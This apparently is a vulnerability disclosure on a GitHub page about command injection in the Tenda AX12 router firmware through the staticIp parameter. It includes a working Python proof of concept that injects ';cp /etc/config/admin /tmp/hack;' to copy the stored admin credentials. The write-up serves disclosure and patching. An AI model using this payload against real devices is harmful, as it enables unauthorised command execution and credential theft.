Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

Vulnerability description

Equipment: Tenda-AX12

Firmware version: V22.03.01.16_CN(AX12 upgrade software_Tenda official website)

Vulnerability Type: Command Injection

Attack effect: execute any command

Vulnerability description

The reason for this vulnerability is that in the provided fast_setting_internet_set interface, the called function sub_42581C does not filter the value of the controllable parameter staticIp passed in by the user, resulting in command injection.

sub_42581C()

It first obtains the value of the staticIp parameter and assigns it to v4, then calls the sprintf function to format the input to the v5 string, and finally calls doSystemCmd_route to execute the command. In the process, no character filtering is performed on the value of staticIp, which means that we can construct any command through this parameter, and finally enter doSystemCmd_route for execution.

POC

The poc injected by the command, in actual situation, needs to be authenticated first.

import requests

url = "http://192.168.112.131/goform/fast_setting_internet_set"
cmds = ";cp /etc/config/admin /tmp/hack;"


payload = {'wanType': '1', 'staticIp': cmds}
r = requests.post(url, data=payload)
print(r.status_code)
print(r.content)

The effect of the attack is as follows. The admin file that saves the userpass in the configuration directory is copied to tmp/hack.

Suggest

It is recommended to upgrade the firmware to the latest version, V22.03.01.21.